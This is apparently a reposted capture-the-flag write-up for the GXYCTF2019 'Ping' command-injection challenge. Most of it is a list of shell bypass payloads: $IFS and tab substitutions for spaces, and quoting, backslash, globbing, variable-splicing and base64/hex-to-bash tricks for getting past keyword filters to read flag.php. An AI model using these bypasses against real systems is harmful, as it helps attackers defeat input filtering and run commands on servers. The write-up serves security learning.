标签：IFS Ping cat flag fla 绕过 php GXYCTF2019

知识点

RCE

审题

不审了吧 很明显的rce 主要记一下一些常用的绕过方式

解题

首先如果抓不到flag可以先抓一下index 得到他的那些过滤

知道过滤之后就开始日题

常用的一些绕过

绕过空格
    $IFS
    ${IFS}
    $IFS$9
    <
    <>
    {cat,flag.php}  //用逗号实现了空格功能，需要用{}括起来
    %20   (space)
    %09   (tab)
    X=$'cat\x09./flag.php';$X       （\x09表示tab，也可以用\x20）
绕过flag(绕过关键字)
    ca\t fla\g.php        反斜线绕过
    cat fl''ag.php        两个单引号绕过
    echo "Y2F0IGZsYWcucGhw" | base64 -d | bash       base64编码绕过(引号可以去掉)  |(管道符) 会把前一个命令的输出作为后一个命令的参数
    echo "63617420666c61672e706870" | xxd -r -p | bash       hex编码绕过(引号可以去掉)
    echo$IFS$2Y2F0IGZsYWcucGhw|base64$IFS$2-d|sh    sh的效果和bash一样
    cat fl[a]g.php       用[]匹配
    cat fla*       用*匹配任意
    a=fl;b=ag;cat $a$b          变量替换
    a=g;cat fla$a
    cp fla{g.php,G}    把flag.php复制为flaG
    ca${21}t a.txt     利用空变量  使用$*和$@，$x(x 代表 1-9),${x}(x>=10)(小于 10 也是可以的) 因为在没有传参的情况下，上面的特殊变量都是为空的 

EOF

标签：IFS,Ping,cat,flag,fla,绕过,php,GXYCTF2019
来源： https://www.cnblogs.com/zhwyyswdg/p/14068370.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。